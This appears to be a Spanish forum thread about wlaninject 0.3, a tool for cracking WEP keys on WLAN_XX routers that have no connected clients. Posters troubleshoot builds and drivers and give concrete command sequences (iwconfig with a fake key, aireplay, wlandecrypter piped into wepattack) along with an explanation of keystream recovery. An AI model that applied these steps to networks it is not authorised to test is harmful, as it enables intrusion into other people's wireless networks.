te he quitado algunos warning molestos de algunas guarrerias un poco graves, pero deberias compilarlo con la opción -Wall y quitarlos todos, al menos para dejarlo un poco más decente, sin variables que no tienen uso etc... Simplemente he agregado un contador de tramas, diviéndolo por el factor y comrpobando que el resto sea cero y si es cero entonces esperar. La ayuda y demas,  la he modificado levemente para lo del factor, un apaño que deberias poner bien.
Código:
if ( (packet_counter % factor) == 0)
  usleep(1);


Un Saludo y espero que te sirva de ayuda


Título: Re: Wlaninject 0.2 - WLAN_XX sin clientes, en 4 minutos. Cagada de libnet arregl
Publicado por: nilp0inter en 23 Diciembre 2006, 11:55 am
Joder, muchas gracias  ;D . A ver si le aplico el parche y lo subo dentro de un ratillo xq voy a estar unos cuantos dias offline.

Lo de las 10000 tramas del fastmode me di cuenta despues de publicarlo y me imagine que seria que estaba el buffer petao xD, pero es la primera vez que juego con libnet y libpcap y es lo que pasa; yo tengo que aprender a palos  :rolleyes:

Muchas gracias de nuevo ;)


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: nilp0inter en 23 Diciembre 2006, 12:48 pm
Ok, ya he aplicado el parche y he arreglao una movida del porcentaje. Ya lo teneis subido.
A ver si tengo un rato y arreglo los millones de cagadas/burradas que tiene.

Muchas gracias axi ;)


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: longits en 23 Diciembre 2006, 12:59 pm
Sois unos maquinorras.

Saludos.


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: odbk en 23 Diciembre 2006, 15:01 pm
Axi , nilp0inter, ... I love you xDD
joder haceis buena pareja podiais estar en contacto fijo que sacais cosas wapas

Por cierto he probao la 0.3 y rula de p**a madre


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 23 Diciembre 2006, 16:25 pm
Ey buenas nil tengo un problema con mi rt73 cuando lo pongo a funcionar me sale esto en el wlaninject:
pianista@pianista-laptop:~/wlaninject-0.3$ sudo wlaninject -e [essid]  -b [BSSID] -i rausb0
wlaninject: libnet_init(): unknown physical layer type 0x321
No se porque puede ser...
Saludoss
PD:Mira el enlace de la primera pagina que lo tienes direecionado a la primera version  ;)



Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: longits en 23 Diciembre 2006, 17:08 pm
Tienes q tener la libreria libnet, pianista.

Saludos.


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 23 Diciembre 2006, 18:08 pm
Y la tengo de hecho, instalada con apt-get al dia...
Probare a compilarla...
No se yo creo que tiene que ver con la tarjeta...
Saludosss


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: *dudux en 23 Diciembre 2006, 19:22 pm
lleva incluida la libreria la version 0.3?


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: LoKi en 24 Diciembre 2006, 00:58 am
Holaa, lo primero GRACIAS por habertelo currado  ;D ahora viene el feedback para la version 0.3:

Como dice pianista, me ocurre que al ejecutar salta el mensaje:

wlaninject: libnet_init(): unknown physical layer type 0x321

Así que en otras palabras la llamada a libnet_init() de la línea 234 esta fallando. He comprobado que esto solo ocurre si antes la tarjeta ha sido puesta en modo monitor con aimon-ng, pues en caso contrario el programa funciona bien...   :huh:

Pero claro, HAY que poner la tarjeta en modo monitor ANTES de ejecutar wlaninject, porque es necesario tener el airodump preparado para recibir paquetes...

He añadido una pausa al programa para poder poner el modo monitor DESPUES de ejecutar wlaninject, es decir, tras la llamada a libnet_init() hago un sleep(5):
1) wlaninject (se queda 5 segundos haciendo el tonto)
2) airmon-ng start eth1
3) airodump-ng -4 ...
4) se cumplen los 5 segundos y wlaninject comienza.

Así todo parece funcionar bien, pero nunca se llega a recibir una respuesta del AP  :-(, eso si, el mensaje "Read XXX packets" del airodump no para de crecer.

Po rcierto, hablando del mensaje de "read xxx packets" del airodump, el valor de xxx comienza a crecer desde el primer momento, pero ¿a que tipo de paquetes se refiere? ¿no son paquetes de datos que valgan para algo, verdad?

Y por ultimo:
Citar
lleva incluida la libreria la version 0.3?
NO, las librerias hay que instalarlas a parte. Y con Debian o Ubuntu, es tan facil como escribir apt-get install <nombre de lo que quieres>. Y si no tienes apt-get... entonces tienes envidia  ;D


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: *dudux en 24 Diciembre 2006, 01:06 am
Citar
Y por ultimo:
Citar
lleva incluida la libreria la version 0.3?
NO, las librerias hay que instalarlas a parte. Y con Debian o Ubuntu, es tan facil como escribir apt-get install <nombre de lo que quieres>. Y si no tienes apt-get... entonces tienes envidia

si claro....

ya se lo que me intentas explicar

olvidalo!
:-\


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 24 Diciembre 2006, 02:13 am
Umm pues yo a mi rt73 la tengo en modo managed asi que no entiendo porque me ocurre pero bueno todo sera probar...
Creo que todo falla en el momento que levanto la interfaz para poder hacer los iwconfigs del principio que hago un ifconfig rausb0 up y a partir de ahi se jodio el wlaninject,pero lo curioso es que hasta sin ningun comando me ha llegadoa  salir eso...
Saludosss


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: axi en 24 Diciembre 2006, 04:07 am
Hola a todos,
ando de vacaciones por ahí y no puedo probar nada, pero os comento lo que pienso acerca de vuestras dudas y os explico un poco lo que yo he visto por si os sirve de ayuda.

Funcionamiento de wlaninject,
primero debemos  autenticarnos y asociarnos con la red elegida, se utiliza una clave incorrecta, por lo que no podremos comunicarnos con la red, pero estamos asociados y autenticados con el AP.
¿Esto tiene sentido? El tema depende del tipo de autenticación utilizada por el AP, en el estándar 802.11 se definen dos tipos de autenticación, Open System authentication, y Shared Key authentication, esta información aparece en campo authentication algorithm de las tramas de administración. Simplificando, en la autenticación abierta con proporcionarle un SSID válido, puedes autenticarte en la red.
El segundo método requiere que el AP envie una trama con un "nonce" en texto claro, que la estación debe devolverle correctamente cifrado con la clave WEP.
Podeis consultarlo todo en más profundidad en el documento del estándar 802.11, que es de dónde os expongo esta información.
http://standards.ieee.org/getieee802/download/802.11b-1999.pdf (http://standards.ieee.org/getieee802/download/802.11b-1999.pdf)

Nota : Como vereis esta segunda opción, nos ofrece el texto claro y el texto cifrado ( si lo capturamos ). Por lo que utilizando ese paquete y el texto claro podemos obtener el stream, y con ese stream cifrar cualquier paquete que tengamos y poder inyectar tráfico a medida en la red. En esto se basan herramientas como wepweidge ( un clásico ) o los ataques de fragmentación.

Por lo tanto, si tenemos la tarjeta asociada y autenticada con el AP, ahora lo que hacemos es, asignarle una IP.
Si ahora hicieramos un ping a una IP de la misma subred de la IP asignada, se intentará enviar por esa interfaz ( suponiendo que no teneis otra interfaz con ese rango de IP etc.. )
y deberían aparecer datos en el aire, cifrados con la key falsa metida al principio. Podéis hacer la prueba poniendo una tarjeta en modo monitor, diferente, a la que teneis autenticada y asociada y escuchar el tráfico en el aire generado por la otra tarjeta.
¿El programa qué hace?
Cambia esa clave falsa 65 y pico mil veces y envia una petición ARP en cada cambio. Si no usaras una mac de alguien conectado, ignoraría esas tramas y no serviria.

Notas sobre divers/tarjetas que funcionan :
En las pruebas que hice, con el driver acx100 en una tarjeta con chipset texas instruments ni con el driver hostap ( no recuerdo que versión ) y tarjeta prism2 ( no recuerdo que version del firmware ) no podia enviar la petición ARP, me enviaba tramas probe request constamente en vez de enviar las tramas de datos ARP.
Con el driver Madwifi y la tarjeta atheros, me enviaba los paquetes perfectamente.
Probad vosotros y me comentais :)
Por lo que yo sé, los drivers madwifi están bastante más avanzados en estos aspectos, y no me extraña que funcionen bien, os remito al ataque 1 en la documentación de aircrack, en el que se menciona que es el único driver que puede inyectar y estar en modo managed a la vez. Aunque en teoría, de este modo deberían funcionar todas ya que en realidad sí estás conectado a una red. No sé, haced pruebas si os interesa, yo tampoco tengo demasiado interés.

Solución para los que no les funciona?
Habría que tener 2 tarjetas, con una te asocias, y con la otra inyectas tráfico, pero este programa no sirve, hace falta cifrar el paquete "desnudo" con la clave wep e inyectarlo por una interfaz en modo monitor, algo como lo que se hace con las herramientas de la suite aircrack.

Errores :

Unknow Physcal layer XXX:
Seguramente es porque la tarjeta no está en su modo "normal",
quizás porque la hayais puesto en modo monitor.
No hace falta poner la tarjeta en modo monitor, las respuestas del AP que nos interesan son de tipo Dato y se deberian poder escuchar cuando la tarjeta está en Modo Managed, si se quiere poner en modo monitor probablemente sólo sea posible con Madwifi y su interfaz raw,
aunque en teoría para esto no sería  necesario.


Un Saludo y espero que os sirva de ayuda :)


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 24 Diciembre 2006, 11:07 am
Pues veras estoy seguro de que no la pongo en monitor asi que no se muy bien porque puede ser...
Lo malo es que mi atheros ahora esta pachucha y claro con la ipw3945 no puedo ya que no puedo mandar arps...
Saludosss


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: LoKi en 24 Diciembre 2006, 18:16 pm
Unknow Physcal layer XXX:
Seguramente es porque la tarjeta no está en su modo "normal",
quizás porque la hayais puesto en modo monitor.
No hace falta poner la tarjeta en modo monitor, ...

Entiendo que el modo monitor no es necesario para lo que hace el wlaninject, sin embargo si que lo es para que airodump capture la respuesta del AP, no? De hecho cuando, por descuido, he intentado arrancarlo sin haber puesto el modo monitor, siempre se ha quejado.


... y claro con la ipw3945 no puedo ya que no puedo mandar arps
¿Por que no se puede? Las peticiones ARP que se envian al AP, al fin y al cabo, son peticiones estandares que cualquier estacion en una red deberia poder mandar ¿no? (no lo tengo muy claro)

Bueno, dejemonos de auditorías y Felices Fiestas a todos  :D


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: odbk en 24 Diciembre 2006, 20:12 pm
Bueno no se si os sirve pero yo tengo una atheros (ar5005g) y todo lo hago desde la troppix 1.2 (con madwifi) y me va a la perfeccion


Felices fiestas y todo eso que se suele decir ...


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 25 Diciembre 2006, 16:18 pm
Umm probare con la ipw3945 por si las moscas pero no se yo que tal ira... ;)
Saludosss


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: pianista en 25 Diciembre 2006, 21:31 pm
Probe pero da el mismo error, da hasta sin poner nada, yo creo que es porque en el momento en el que enchufo la rt73 se jode todo...
En fin seguire probando ;)
Saludoss


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: Serch_Serch en 26 Diciembre 2006, 00:41 am
Primeras dudas.

En el primer post, pones q tenemos q configurar la trajeta como 192.168.1.250. Eso significa q todas las redes de ese tipo tienen como IP 192.168.1.x?? Lo digo xq si son 192.168.0.x no entraremos en la red...

Bueno, si todo va bien, tendremos un archivo de captura, q luego hacemos
wlandecrypter {BSSID} {ESSID} | wepattack -f replayxxxx.cap

y ya está no??


Título: Wlaninject 0.3 + wifislax 1.1 : no me compila
Publicado por: jururu en 26 Diciembre 2006, 13:17 pm
Hago esto:
make install
install -m 755 -d /usr/local/lib/
install -m 755 libiw.so.28 /usr/local/lib/
ln -sfn libiw.so.28 /usr/local/lib//libiw.so
*** Don't forget to add /usr/local/lib/ to /etc/ld.so.conf, and run ldconfig as root. ***
******************************* ESTO TARDARÁ UN MOMENTO ********************************
gcc   -Os -I. -lnet -lpcap  -MMD    -o wlaninject wlaninject.o libiw.so.28 -lm
wlaninject.o(.text+0x208): In function `do_libnet_init':
: undefined reference to `libnet_destroy'
wlaninject.o(.text+0x246): In function `do_libnet_init':
: undefined reference to `libnet_init'
wlaninject.o(.text+0x464): In function `main':
: undefined reference to `libnet_addr2name4'
wlaninject.o(.text+0x6c9): In function `main':
: undefined reference to `pcap_open_live'
wlaninject.o(.text+0x6f3): In function `main':
: undefined reference to `pcap_compile'
wlaninject.o(.text+0x70d): In function `main':
: undefined reference to `pcap_setfilter'
wlaninject.o(.text+0x732): In function `main':
: undefined reference to `libnet_get_hwaddr'
wlaninject.o(.text+0x744): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0x76a): In function `main':
: undefined reference to `libnet_get_ipaddr4'
wlaninject.o(.text+0x77e): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xaa1): In function `main':
: undefined reference to `libnet_build_arp'
wlaninject.o(.text+0xab7): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xaf9): In function `main':
: undefined reference to `libnet_build_ethernet'
wlaninject.o(.text+0xb0f): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xb4c): In function `main':
: undefined reference to `libnet_write'
wlaninject.o(.text+0xb5b): In function `main':
: undefined reference to `libnet_geterror'
collect2: ld returned 1 exit status
make: *** [wlaninject] Error 1

No tengo ni pajotera de linux, estoy empezando ( lo siento)

Pero creo que wifislax lleva ettercap-ng y tambien libnet 1.1.2.1.
Por que no me compila wlaninject???

Puede ser que hay otra libnet 0.10, que parece que es la que utiliza nilp0inter ?
 Esta me la he bajado, pero :

make
make -C lib/ lib
make[1]: Entering directory `/mio/redes/WLAN_XX/libnet/lib'
gcc -O2 -Wall -Werror -Wno-unused -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -g -I../include -Iinclude -DTARGET_LINUX   -c -o drivers/internet.o drivers/internet.c
drivers/internet.c: In function `do_init_channel':
drivers/internet.c:116: warning: dereferencing type-punned pointer will break strict-aliasing rules
make[1]: *** [drivers/internet.o] Error 1
make[1]: Leaving directory `/mio/redes/WLAN_XX/libnet/lib'
make: *** [lib] Error 2

joooooo yo quiero que me funcione.

Ayuda por favor, y lo dicho siento ir tan atrasado


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: popon en 26 Diciembre 2006, 16:19 pm
salut a todos...

estoy empezando con el wlaninject e me da este error:
hago el make

gcc   -Os -I. -lnet -lpcap  -MMD    -o wlaninject wlaninject.o libiw.so.28 -lm
/usr/bin/ld: no se puede encontrar -lpcap
collect2: ld returned 1 exit status
make: *** [wlaninject] Error 1

alguna idea? :huh:
gracias


Título: Re: Wlaninject 0.3 + wifislax 1.1 : no me compila
Publicado por: jvk en 27 Diciembre 2006, 13:58 pm
Hago esto:
make install
install -m 755 -d /usr/local/lib/
install -m 755 libiw.so.28 /usr/local/lib/
ln -sfn libiw.so.28 /usr/local/lib//libiw.so
*** Don't forget to add /usr/local/lib/ to /etc/ld.so.conf, and run ldconfig as root. ***
******************************* ESTO TARDARÁ UN MOMENTO ********************************
gcc   -Os -I. -lnet -lpcap  -MMD    -o wlaninject wlaninject.o libiw.so.28 -lm
wlaninject.o(.text+0x208): In function `do_libnet_init':
: undefined reference to `libnet_destroy'
wlaninject.o(.text+0x246): In function `do_libnet_init':
: undefined reference to `libnet_init'
wlaninject.o(.text+0x464): In function `main':
: undefined reference to `libnet_addr2name4'
wlaninject.o(.text+0x6c9): In function `main':
: undefined reference to `pcap_open_live'
wlaninject.o(.text+0x6f3): In function `main':
: undefined reference to `pcap_compile'
wlaninject.o(.text+0x70d): In function `main':
: undefined reference to `pcap_setfilter'
wlaninject.o(.text+0x732): In function `main':
: undefined reference to `libnet_get_hwaddr'
wlaninject.o(.text+0x744): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0x76a): In function `main':
: undefined reference to `libnet_get_ipaddr4'
wlaninject.o(.text+0x77e): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xaa1): In function `main':
: undefined reference to `libnet_build_arp'
wlaninject.o(.text+0xab7): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xaf9): In function `main':
: undefined reference to `libnet_build_ethernet'
wlaninject.o(.text+0xb0f): In function `main':
: undefined reference to `libnet_geterror'
wlaninject.o(.text+0xb4c): In function `main':
: undefined reference to `libnet_write'
wlaninject.o(.text+0xb5b): In function `main':
: undefined reference to `libnet_geterror'
collect2: ld returned 1 exit status
make: *** [wlaninject] Error 1

No tengo ni pajotera de linux, estoy empezando ( lo siento)

Pero creo que wifislax lleva ettercap-ng y tambien libnet 1.1.2.1.
Por que no me compila wlaninject???

Puede ser que hay otra libnet 0.10, que parece que es la que utiliza nilp0inter ?
 Esta me la he bajado, pero :

make
make -C lib/ lib
make[1]: Entering directory `/mio/redes/WLAN_XX/libnet/lib'
gcc -O2 -Wall -Werror -Wno-unused -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -g -I../include -Iinclude -DTARGET_LINUX   -c -o drivers/internet.o drivers/internet.c
drivers/internet.c: In function `do_init_channel':
drivers/internet.c:116: warning: dereferencing type-punned pointer will break strict-aliasing rules
make[1]: *** [drivers/internet.o] Error 1
make[1]: Leaving directory `/mio/redes/WLAN_XX/libnet/lib'
make: *** [lib] Error 2

joooooo yo quiero que me funcione.

Ayuda por favor, y lo dicho siento ir tan atrasado


Para los que tengan slackware o alguna distro basada en esta, y todo bien configurado ( libnet y libpcap se pueden encontrar en www.linuxpackages.net )

al poner "make" dará errores despues de :
gcc   -Os -I. -lnet -lpcap  -MMD    -o wlaninject wlaninject.o libiw.so.28 -lm

Bien, lo primero hacemos un" make clean"
Despues, editamos Makefile y buscamos :
#BUILD_STATIC = y ( podemos usar vi, vim, o nano...) y quitamos el #
Guardamos y ponemos make.
Nos dará otro error parecido, que solucionaremos poniendo:
" gcc -Wall -o wlaninject wlaninject.c libiw.a -lm -lnet -lpcap "

Tras esto tendremos nuestro ejecutable wlaninject.
Recordar levantar la interfaz, sino no funcionará al ejecutarlo.

Ami me funcionó en slackware 11 y en una distr basada en slackware 10.2 ( slax )

Para instalar paquetes tgz: installpkg nombre.tgz

Saludos.


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: jururu en 29 Diciembre 2006, 09:33 am
Muchas gracias jvk, ya lo he podido compilar.

Peeerooooo... lo que a todos.
Tengo wifislax 1.1 y prismGT.
Efectivamente el aireplay -4 no me deja en modo managed, solo en monitor.
El airodump-ng se arranca, peeeero si sales y haces iwconfig, compruebas que te la ha puesto en modo monitor y probablemente el wlaninject no este mandado lo que queremos y como queremos.
Si  lanzo wlaninject, y rapidamente en otra pantalla la pongo en monitor y lanzo airodump o aireplay, parece que trabaja. Pero no me caza nada. Si vamos haciendo iwconfig en otra pantalla, vemos que esta en modo monitor y va cambiando las distintas keys.
Pero la duda es si realmente se esta intentando asociar en condiciones ????
... AXI Jo macho : "Por lo que yo sé, los drivers madwifi están bastante más avanzados en estos aspectos, y no me extraña que funcionen bien, os remito al ataque 1 en la documentación de aircrack, en el que se menciona que es el único driver que puede inyectar y estar en modo managed a la vez."

Tu si que lees ... y te enteras.

*** ah, en tropix me rulaba todo de maravilla, en wifislax 1.1 tengo problemas con la tarjeta o el driver o no se que. Si me intento conectar nada mas arrancar .... se me queda colgao. Ayer probe a lanzar kismet y alugo hacer airmon-ng stop eth1 y parece que asin no se me cuelga ***

Saludos


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: elPRiNCiPiTo en 4 Enero 2007, 12:47 pm
Hola, estoy empezando a usar ubuntu y voy probando todo a la vez asi que hay cosas que ahgo bien y otras q no tengo ni idea aunque sean mas simples..
Creo q esta es una de las simples pero que no tengo ni idea de como se hace. Donde decis:
(El ejecutable se copia a /usr/local/sbin, si no lo teneis en el path añadidlo)
¿Como se hace eso de añadir un path? he mirado un poco pero no se muy bien lo que hay que hacer, he visto q hay dos formas, para un usuario o para todos o algo parecido pero no se que fichero es el q hay q editar y menos aun como
Otra cosa, porque me da este error?
 iwconfig ath0 key s:AAAAAAAAAAAAA
 Error for wireless request "Set Encode" (8B2A) :
     SET failed on device ath0 ; Invalid argument.
 

de momento estoy ahi parado pero cuando lo tenga en el comando siguinte:
 aireplay -4 -b {BSSID} -f1 {INTERFAZ}

de donde saco BSSID?

Me echais una mano??

Gracias


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: Serch_Serch en 4 Enero 2007, 22:54 pm
Bueno, os cuento.

1.- Me bajo el scrip
2.- Lo descomprimo y le doy los permisos
3.- Pongo la tarjeta en modo moniroe
4.- Me pongo a capturar datos
5.- aireplay -4 b BSSID -f1 rausb0

En este momento observo q el airodump se para, se queda "colgao"

Hago algo mal??


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: rh3nt0n en 4 Enero 2007, 23:47 pm
Bueno, os cuento.

1.- Me bajo el scrip
2.- Lo descomprimo y le doy los permisos
3.- Pongo la tarjeta en modo moniroe
4.- Me pongo a capturar datos
5.- aireplay -4 b BSSID -f1 rausb0

En este momento observo q el airodump se para, se queda "colgao"

Hago algo mal??

[coña] lo raro es que no te de un raquetazo ...  ;D ;D ;D [/coña]


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: Serch_Serch en 5 Enero 2007, 00:19 am
jeje

El teclado a veces me juega unas malas pasadas..

Pero venga, xq me falla?? Hago algo mal?? He leido (no se donde) q tengo q levantar la tarjeta... Bueno, a ver si alguien me ayuda.


Título: Movida xd
Publicado por: ivan2110 en 5 Enero 2007, 13:16 pm
Yo voy un poco peor la verdad, soy desos que leen por aki pero q nunca se han atrevido a escribir,asiq bueno ante la duda pues os comento ...
Para empezar utilizo kubuntu 6.10, tengo un centrino y una proxim gold con el chipset atheros

Intento instalar todo lo necesario, el paquete aircrack ya lo tenia asiq voy con el libnet y el libpcap

Código:
sudo apt-get install libpcap0.8-dev

perfecto

Código:
sudo apt-get install libnetl libnetl-dev
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias
Leyendo información de estado... Hecho
E: No se pudo encontrar el paquete libnetl

primera jodienda, bueno no pasa nada voy a la web y me pillo el tar


Código:
$ tar -zxvf libnet-0.10.11.tar.gz 

leo el readme, me dice q tengo q pillar el archivos linux.mak como port.mak en el directorio principal vale lo hago y ahora se supone q tengo q hacer el make

Código:
libnet$ make
make -C lib/ lib
make[1]: se ingresa al directorio `/home/ifdez/Desktop/libnet/lib'
gcc -O2 -Wall -Werror -Wno-unused -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -g -I../include -Iinclude -DTARGET_LINUX   -c -o drivers/internet.o drivers/internet.c
cc1: warnings being treated as errors
drivers/internet.c: In function ‘do_init_channel’:
drivers/internet.c:116: warning: dereferencing type-punned pointer will break strict-aliasing rules
drivers/internet.c:140: warning: pointer targets in passing argument 3 of ‘getsockname’ differ in signedness
drivers/internet.c: In function ‘drv_recv’:
drivers/internet.c:205: warning: pointer targets in passing argument 6 of ‘recvfrom’ differ in signedness
make[1]: *** [drivers/internet.o] Error 1
make[1]: se sale del directorio `/home/ifdez/Desktop/libnet/lib'
make: *** [lib] Error 2

asiq na con esas estamos, por supuesto cuando hago el make al wlaninject le faltan las librerias del libnet, spero q me echeis un cable, y bueno ya puestos os hago una pregunta el wifislx 1.2 tiene todo esto ya configurao y listo para usar? un saludo


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: Honda_CR-V en 8 Enero 2007, 11:37 am
funciona y en menos de 4 minutos

soy unos hachas

un saludo



Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: jramisc en 10 Enero 2007, 17:49 pm
saludos cordiales a todos y feliz 2007..
desde hace 1 semana dispongo de un imagenio (regalo de reyes) y me gustaría probar su seguridad..
perdonad mi completa ignorancia, pero voy a realizaros una consulta rápida, concisa y sencilla:
dispongo de wifislax 1.2 y del excelente wlaninject 0.3.. podríais indicarme paso a paso (poniendo frases con cortar y pegar, que seguro se han escrito ya en estas 5 páginas de post que llevamos) qué tengo que hacer para correr el tal wlaninject en la versión del wifislax 1.2 en live-cd?
es que me he perdido con los libnet, libcap y demás gaitas linuxeras..
gracias avanzadas...


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: jramisc en 11 Enero 2007, 11:33 am
Conclusiones:

El wlaninject NO rula bajo wifislax porque éste no lleva los madwifi implementados.

El wlaninject SÍ rula bajo troppix porque éste lleva los madwifi implementados.

Razón: los drivers madwifi son los únicos que pueden ponerse en modo managed y monitor a la vez, condición indispensable para que la movida funcione..

Corregid si estoy equivocado... :rolleyes:


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: elPRiNCiPiTo en 12 Enero 2007, 15:53 pm
 Hola, a ver si me echáis una mano que no soy capaz y por mas que busco parece que a nadie mas le pasa lo que a mi.
 
 He instalado el wlainject en ubuntu y creo que eso est bien, tb instale las librerías que necesitaba siguiendo las indicaciones de este post. Intento seguir los pasos del manual con mi tarjeta pcmcia que tiene chip atheros y para la que he instalado los drives madwifi asi:
Código:
ifconfig ath0 down

ifconfig wifi0 down

rmmod wlan_wep ath_rate_sample ath_rate_onoe \
   ath_pci wlan ath_hal ath_rate_amrr 2>/dev/null

wget http://snapshots.madwifi.org/madwifi-ng-current.tar.gz

wget http://patches.aircrack-ng.org/madwifi-ng-r1886.patch

tar -zxvf madwifi-ng-current.tar.gz

cd madwifi-ng-r1886-20071201

patch -Np1 -i ../madwifi-ng-r1886.patch

make

make install

depmod -ae

modprobe ath_pci

 Pongo como los instalo porque creo que el error podria estar en los drivers.
 Lo que me pasa es que los primeros pasos los hago con la tarjeta en modo managed pero cuando pongo el comando del aireplay me da error, dice que no existe ese dispositivo, creo que es porque no entra en modo monitor pero leo que no hace falta. En fin a ver si me podeis ayudar que ando mas perdido...

Otra cosa, como he probado mil veces esos pasos y no he sido capaz he estado investigando como podria hacerlo con una tarjeta en modo monitor y otra en managed ya que tengo esta pcmcia con chip atheros y una ipw3945 pero tp lo veo claro ¿hay algún post que indique como hacerlo o no sería mas sencillo?

Muchas gracias


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: rh3nt0n en 12 Enero 2007, 16:27 pm
Conclusiones:

El wlaninject NO rula bajo wifislax porque éste no lleva los madwifi implementados.

sin matizar ... te quivocas , wifislax si lleva los madwifi 'implementados' los madwifi-ng , evidentemente ..

El wlaninject SÍ rula bajo troppix porque éste lleva los madwifi implementados.


Razón: los drivers madwifi son los únicos que pueden ponerse en modo managed y monitor a la vez, condición indispensable para que la movida funcione..

no son los unicos , los de ipw2200 tambien pueden hacerlo


Corregid si estoy equivocado... :rolleyes:

te corrijo .. en wifislax si estan implementados los madwifi ...
y pueden instalarse los madwifi-old ..
los problemas son otros .


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: elPRiNCiPiTo en 16 Enero 2007, 11:48 am
Hola, voy a dar otro poca la vara a ver si sube el post y alguien me aclara lo del comando que no me funciona.

He estado leyendo y veo que lo que puede ser es que tenga mal los drivers de la atheros. ¿que dirvers utilizais vosotros? yo tngo la ultima version de madwifi y no me va, como he explicado al poner el comando del aireplay da error, osea q parece que no mapasa de managed a monitor.

Gracias, por la ayuda


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: elPRiNCiPiTo en 19 Enero 2007, 20:59 pm
Intento editar mi post anterior pero no se porque da error la pagina asi que pongo uno nuevo que parece que si me deja.
Sigo investigando que es lo que hago mal y no doy con la forma, he reinstalado el aircrack y el aircrack-ng y nada. Estos son los pasos que doy y exactamente y el error que me sale:
Código:
:~$ sudo iwconfig ath0 essid WLAN_83
:~$ sudo iwconfig ath0 ap 00:01:38:68:32:F7
:~$ sudo iwconfig ath0 key s:AAAAAAAAAAAAA
:~$ sudo ifconfig ath0 192.168.1.250 up
:~$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      unassociated  ESSID:"XXXX" 
          Mode:Managed  Frequency=nan kHz  Access Point: Not-Associated   
          Bit Rate:0 kb/s   Tx-Power:16 dBm   
          Retry limit:15   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:42   Missed beacon:0

sit0      no wireless extensions.

wifi0     no wireless extensions.

ath0      IEEE 802.11g  ESSID:"WLAN_83" 
          Mode:Managed  Frequency:2.437 GHz  Access Point: 00:01:38:XX:XX:XX   
          Bit Rate:1 Mb/s   Tx-Power:18 dBm   Sensitivity=0/3 
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=127/94  Signal level=-225 dBm  Noise level=-96 dBm
          Rx invalid nwid:12426  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

:~$ sudo aireplay -4 -b 00:01:38:XX:XX:XX -f1 ath0
error: "dev.ath0.rawdev" is an unknown key
ath0raw: ERROR while getting interface flags: No such device
ioctl(SIOCGIFINDEX) failed: No such device

¿Alguien sabe que puede ser?

Gracias


Título: Re: Wlaninject 0.3 - WLAN_XX sin clientes. Aplicado parche de axi.
Publicado por: tarkus en 24 Enero 2007, 20:32 pm
Buenas alguien me puede ayudar con este error, antes decir que tengo todas las librerias del libnet y demás, pero cuando ejecuto   wlaninject, me da el siguiente error.


wlaninject: libnet_init(): unknown physical layer type 0x321


Por favor alguien me puede ayudar??
Gracias y un saludo a todos


